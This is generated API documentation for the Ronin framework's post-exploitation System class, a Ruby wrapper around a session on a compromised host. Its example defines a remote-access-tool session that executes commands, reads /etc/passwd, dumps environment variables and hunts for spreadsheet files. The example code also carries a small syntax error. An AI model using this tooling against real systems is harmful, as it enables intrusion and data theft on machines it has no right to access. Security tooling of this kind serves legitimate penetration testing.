Class: Ronin::PostEx::System

Inherits:
Resource show all
Defined in:
lib/ronin/post_ex/system.rb,
lib/ronin/post_ex/system/fs.rb,
lib/ronin/post_ex/system/shell.rb,
lib/ronin/post_ex/system/process.rb

Overview

Represents a successfully compromised system. The System class will wraps around a session object which defines syscall-like post-exploitation API for reading/writing files, run commands, etc.

Supported API Functions

  • sys_time -> Integer
  • sys_hostname -> String

Example

Define the session class which defines the Post-Exploitation API methods:

require 'base64'

class SimpleRATSession < Ronin::PostEx::Sessions::Session

  def initialize(socket)
    @socket = socket
  end

  def call(name,*args)
    @socket.puts("#{name} #{args.join(' ')}")

    Base64.strict_decode64(@socket.gets(chomp: true)(
  end

  def shell_exec(command)
    call('EXEC',command)
  end

  def fs_readfile(path)
    call('READ',path)
  end

  def process_pid
    call('PID').to_i
  end

  def process_getuid
    call('UID').to_i
  end

  def process_environ
    Hash[
      call('ENV').each_line(chomp: true).map { |line|
        line.split('=',2)
      }
    ]
  end

end

Initialize a new System object that wraps around the client:

session = SimpleRATSession.new(socket)
system  = Ronin::PostEx::System.new(session)

Interact with the system's remote files as if they were local files:

file = system.fs.open('/etc/passwd')
file.each_line do |line|
  user, x, uid, gid, name, home_dir, shell = line.split(':')

  puts "User Detected: #{user} (id=#{uid})"
end

Get information about the current process:

system.process.pid
# => 1234
system.process.getuid
# => 1001
system.process.environ
# => {"HOME"=>"...", "PATH"=>"...", ...}

Execute commands on the remote system:

system.shell.ls('/')
# => "bin\nboot\ndev\netc\nhome\nlib\nlib64\nlost+found\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsnap\nsrv\nsys\ntmp\nusr\nvar\n"
system.shell.exec("find -type f -name '*.xls' /srv") do |path|
  puts "Found XLS file: #{path}"
end

Defined Under Namespace

Classes: FS, Process, Shell

Instance Attribute Summary collapse

Attributes inherited from Resource

#session

Instance Method Summary collapse

Methods inherited from Resource

#supports, #supports?

Constructor Details

#initialize(session) ⇒ System

Initializes the system.

Parameters:

  • session (Object)

    The object which defines the Post-Exploitation API methods.



137
138
139
140
141
142
143
 
# File 'lib/ronin/post_ex/system.rb', line 137

def initialize(session)
  super(session)

  @fs      = FS.new(session)
  @process = Process.new(session)
  @shell   = Shell.new(session)
end

Instance Attribute Details

#fsSystem::FS (readonly)

The File-System resource.

Returns:



119
120
121
 
# File 'lib/ronin/post_ex/system.rb', line 119

def fs
  @fs
end

#processSystem::Process (readonly)

The Process resource.

Returns:



124
125
126
 
# File 'lib/ronin/post_ex/system.rb', line 124

def process
  @process
end

#shellSystem::Shell (readonly)

The Shell resource.

Returns:



129
130
131
 
# File 'lib/ronin/post_ex/system.rb', line 129

def shell
  @shell
end

Instance Method Details

#exitObject

Exits the process.

See Also:



185
186
187
 
# File 'lib/ronin/post_ex/system.rb', line 185

def exit
  @process.exit
end

#hostnameString

Note:

Requires the sys_hostname method be defined by the Resource#session object.

Gets the system's hostname.

Returns:

  • (String)

    The system's local hostname.



169
170
171
 
# File 'lib/ronin/post_ex/system.rb', line 169

def hostname
  @session.sys_hostname
end

#interactObject

Starts an interactive post-exploitation system shell.



176
177
178
 
# File 'lib/ronin/post_ex/system.rb', line 176

def interact
  CLI::SystemShell.start(self)
end

#timeTime

Note:

Requires the sys_time method be defined by the Resource#session object.

Gets the current time.

Returns:

  • (Time)

    The current time.



154
155
156
 
# File 'lib/ronin/post_ex/system.rb', line 154

def time
  Time.at(@session.sys_time.to_i)
end